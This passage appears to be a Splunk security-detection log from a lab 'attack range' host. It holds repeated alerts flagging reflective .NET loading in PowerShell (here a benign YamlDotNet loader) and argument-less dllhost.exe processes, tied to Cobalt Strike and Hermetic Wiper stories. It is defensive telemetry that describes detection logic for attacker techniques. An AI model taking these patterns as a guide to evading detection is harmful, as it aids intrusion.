($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T22:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T22:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664920800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664920800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="6048", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664920800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664920800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x17a0", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664924132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T21:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T21:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664924132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T21:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T21:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664924132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T21:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T21:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664924132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T21:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T21:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664917200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664917200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2744", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664917200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664917200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0xab8", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664920531, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T20:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T20:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return 